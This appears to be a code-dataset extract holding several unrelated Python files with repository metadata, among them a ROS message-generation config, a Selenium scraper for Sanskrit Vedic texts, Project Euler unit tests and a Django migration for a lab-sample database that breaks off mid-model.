| 0
| 0
|
0
| 7
|
a341beb68678556c3aff7678653b09cccf9da48f
| 2,675
|
py
|
Python
|
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | 1
|
2021-11-08T12:24:24.000Z
|
2021-11-08T12:24:24.000Z
|
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | null | null | null |
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Accel.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Inertia.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/InertiaStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point32.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PointStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Polygon.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PolygonStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose2D.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseArray.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Quaternion.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/QuaternionStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Transform.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TransformStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Twist.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3.ms
g;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3Stamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Wrench.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/WrenchStamped.msg"
services_str = ""
pkg_name = "geometry_msgs"
dependencies_str = "std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "geometry_msgs;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg;std_msgs;/usr/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python3"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/usr/lib/genmsg/genmsg_check_deps.py"
| 222.916667
| 2,227
| 0.843738
| 447
| 2,675
| 4.800895
| 0.167785
| 0.178938
| 0.195713
| 0.223672
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0
| 0.002272
| 0.01271
| 2,675
| 11
| 2,228
| 243.181818
| 0.810299
| 0.018318
| 0
| 0
| 1
| 0.222222
| 0.922637
| 0.89939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a348e693fafe80e9418495d3dbcc2e9d576fb160
| 58
|
py
|
Python
|
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | null | null | null |
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | 1
|
2021-12-09T07:39:58.000Z
|
2021-12-10T01:45:34.000Z
|
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | null | null | null |
from .core import COSFileSystem
from .core import COSFile
| 19.333333
| 31
| 0.827586
| 8
| 58
| 6
| 0.625
| 0.333333
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 32
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a3954c745eb1029d3dd1df5c75c8e1f705c2152a
| 6,056
|
py
|
Python
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 7
|
2020-04-25T08:55:55.000Z
|
2020-12-21T05:31:00.000Z
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 15
|
2020-04-25T08:31:42.000Z
|
2021-07-24T12:23:42.000Z
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 4
|
2020-04-25T06:28:37.000Z
|
2020-12-19T21:30:10.000Z
|
import logging
import os
import sys
import traceback
from selenium.common.exceptions import NoSuchElementException
from doc_curation import text_data, md_helper
from doc_curation.scraping import parankusha
def get_taittiriiya(browser):
# parankusha.click_link_by_text(browser=browser, element_text="मूलपाठः")
# get_text(browser=browser, text_id="पदपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/padapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
# get_text(browser=browser, text_id="क्रमपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/kramapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
# get_text(browser=browser, text_id="संहितायाः भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/saMhitA.json"))
# get_text(browser=browser, text_id="संहितायाः सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/saMhitA.json"))
# get_text(browser=browser, text_id="संहिता", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
parankusha.get_structured_text(browser=browser, start_nodes=["विद्यास्थानानि", "वेदाः", "यजुर्वेदः", "कृष्णयजुर्वेदः", "भाष्यम्", "भट्टभास्करभाष्यम्", "ब्राह्मणस्य भट्टभास्करभाष्यम्", "expand:ब्राह्मणस्य भट्टभास्करभाष्यम्"], base_dir="/home/vvasuki/vvasuki-git/saMskAra/content/sangrahaH/taittirIyA/brAhmaNam/bhaTTa-bhAskara-bhAShyam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "vedaH/taittirIya/bhAShya/bhaTTa-bhAskara/brAhmaNa.json"))
# get_text(browser=browser, text_id="ब्राह्मणम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/brAhmaNam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/brAhmaNa.json"))
# get_text(browser=browser, text_id="ब्राह्मणस्य सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/brAhmaNam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/brAhmaNa.json"))
# get_text(browser=browser, text_id="आरण्यकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/AraNyakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/AraNyaka.json"))
# get_text(browser=browser, text_id="आरण्यकस्य भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/AraNyakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/AraNyaka.json"))
# get_text(browser=browser, text_id="आरण्यकस्य सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/AraNyakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/AraNyaka.json"))
# get_text(browser=browser, text_id="काठकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/kAThakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/kAThaka.json"))
# get_text(browser=browser, text_id="काठकस्य भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/kAThakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/kAThaka.json"))
# def get_rv():
# # get_text(browser=browser, text_id="क्रमपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/kramapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/saMhitA.json"))
# # get_text(browser=browser, text_id="पदपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/padapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/saMhitA.json"))
# # get_text(browser=browser, text_id="ब्राह्मणम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/brAhmaNam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/brAhmaNam.json"))
# # get_text(browser=browser, text_id="आरण्यकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/AraNyakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/AraNyakam.json"))
#
#
# def get_kauthuma():
# parankusha.click_link_by_text(browser=browser, element_text="ऋग्वेदः")
# parankusha.click_link_by_text(browser=browser, element_text="यजुर्वेदः")
# # get_text(browser=browser, text_id="संहिता", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/saMhitA.json"))
# # get_text(browser=browser, text_id="छन्दःपदम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/ChandaHpadam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/ChandaHpadam.json"))
# get_text(browser=browser, text_id="स्तोभपदम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/stobhapadam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/stobhapadam.json"))
# # get_text(browser=browser, text_id="रहस्यगानम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/rahasyagAnam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/rahasyagAnam.json"))
if __name__ == '__main__':
browser = parankusha.get_logged_in_browser(headless=False)
get_taittiriiya(browser=browser)
# get_rv()
# get_kauthuma()
# browser.implicitly_wait(13)
browser.close()
| 106.245614
| 464
| 0.768824
| 1,109
| 6,056
| 4.092876
| 0.12083
| 0.055519
| 0.095175
| 0.083278
| 0.851069
| 0.848645
| 0.848645
| 0.840053
| 0.820665
| 0.777484
| 0
| 0.00035
| 0.056473
| 6,056
| 56
| 465
| 108.142857
| 0.768113
| 0.83537
| 0
| 0
| 0
| 0.230769
| 0.303441
| 0.158498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.538462
| 0
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
6e5f5124411f1478a7d23c9e37403e05b55ee90f
| 1,709
|
py
|
Python
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | 1
|
2020-04-21T11:39:25.000Z
|
2020-04-21T11:39:25.000Z
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | 7
|
2020-02-12T01:08:01.000Z
|
2022-02-10T11:56:56.000Z
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | null | null | null |
from projecteuler.problems.problems_0051_0100.problem_0051_prime_digit_replacements import problem_0051
from projecteuler.problems.problems_0051_0100.problem_0052_permuted_multiples import problem_0052
from projecteuler.problems.problems_0051_0100.problem_0053_combinatoric_selections import problem_0053
from projecteuler.problems.problems_0051_0100.problem_0054_poker_hands import problem_0054
from projecteuler.problems.problems_0051_0100.problem_0055_lychrel_numbers import problem_0055
from projecteuler.problems.problems_0051_0100.problem_0056_powerful_digit_sum import problem_0056
from projecteuler.problems.problems_0051_0100.problem_0057_square_root_convergents import problem_0057
from projecteuler.problems.problems_0051_0100.problem_0058_spiral_primes import problem_0058
from projecteuler.problems.problems_0051_0100.problem_0059_xor_decryption import problem_0059
from projecteuler.problems.problems_0051_0100.problem_0063_powerful_digit_counts import problem_0063
def test_problem_0051():
assert problem_0051(6) == 13
assert problem_0051(7) == 56003
assert problem_0051(8) == 121313
def test_problem_0052():
assert problem_0052() == 142857
def test_problem_0053():
assert problem_0053() == 4075
def test_problem_0054():
assert problem_0054('p054_poker.txt') == 376
def test_problem_0055():
assert problem_0055(10000) == 249
def test_problem_0056():
assert problem_0056(100) == 972
def test_problem_0057():
assert problem_0057(1000) == 153
def test_problem_0058():
assert problem_0058(0.1) == 26241
def test_problem_0059():
assert problem_0059('p059_cipher.txt') == 129448
def test_problem_0063():
assert problem_0063() == 49
| 32.245283
| 103
| 0.829725
| 236
| 1,709
| 5.59322
| 0.271186
| 0.118182
| 0.181818
| 0.242424
| 0.356061
| 0.356061
| 0.356061
| 0
| 0
| 0
| 0
| 0.208089
| 0.102984
| 1,709
| 52
| 104
| 32.865385
| 0.652968
| 0
| 0
| 0
| 0
| 0
| 0.016969
| 0
| 0
| 0
| 0
| 0
| 0.375
| 1
| 0.3125
| true
| 0
| 0.3125
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6e6e5dd3837aba85634a4c33712013b2a2d65014
| 132,264
|
py
|
Python
|
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | null | null | null |
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | 7
|
2020-01-29T19:53:33.000Z
|
2021-06-10T19:38:52.000Z
|
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-02-18 15:37
import datetime
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import liliapi.models
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AnalysisBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('analysis_batch_description', models.CharField(blank=True, max_length=128)),
('analysis_batch_notes', models.CharField(blank=True, max_length=128)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatch_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatch_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'analysisbatches',
'db_table': 'lili_analysisbatch',
},
),
migrations.CreateModel(
name='ConcentrationType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='concentrationtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='concentrationtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_concentrationtype',
},
),
migrations.CreateModel(
name='ExtractionBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('re_extraction_notes', models.TextField(blank=True)),
('extraction_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('extraction_date', models.DateField(db_index=True, default=datetime.date.today)),
('pcr_date', models.DateField(db_index=True, default=datetime.date.today)),
('qpcr_template_volume', models.DecimalField(decimal_places=10, default=6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('sample_dilution_factor', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('qpcr_reaction_volume', models.DecimalField(decimal_places=10, default=20, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('ext_pos_dna_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_dna_invalid', models.BooleanField(default=True)),
('inh_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('analysis_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionbatch_creator', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'extractionbatches',
'db_table': 'lili_extractionbatch',
},
),
migrations.CreateModel(
name='FilterType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='filtertype_creator', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_filtertype',
},
),
migrations.CreateModel(
name='Freezer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('racks', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('boxes', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('rows', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spots', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezer_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezer_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_freezer',
},
),
migrations.CreateModel(
name='Inhibition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('inhibition_date', models.DateField(db_index=True, default=datetime.date.today)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('dilution_factor', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='inhibition_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inhibitions', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='inhibition_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_inhibition',
},
),
migrations.CreateModel(
name='Matrix',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='matrix_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='matrix_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'matrices',
'db_table': 'lili_matrix',
},
),
migrations.CreateModel(
name='NucleicAcidType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='nucleicacidtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='nucleicacidtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_nucleicacidtype',
},
),
migrations.CreateModel(
name='PCRReplicateBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('replicate_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('notes', models.TextField(blank=True)),
('ext_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_invalid', models.BooleanField(default=True)),
('rt_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_invalid', models.BooleanField(default=True)),
('pcr_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_invalid', models.BooleanField(default=True)),
('pcr_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_invalid', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatch_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicatebatches', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatch_modifier', to=settings.AUTH_USER_MODEL)),
('re_pcr', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicatebatches', to='liliapi.PCRReplicateBatch')),
],
options={
'verbose_name_plural': 'pcrreplicatebatches',
'db_table': 'lili_pcrreplicatebatch',
},
),
migrations.CreateModel(
name='RecordType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='recordtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='recordtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_recordtype',
},
),
migrations.CreateModel(
name='ReverseTranscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('template_volume', models.DecimalField(decimal_places=10, default=8.6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('reaction_volume', models.DecimalField(decimal_places=10, default=50, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('rt_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('re_rt_notes', models.TextField(blank=True)),
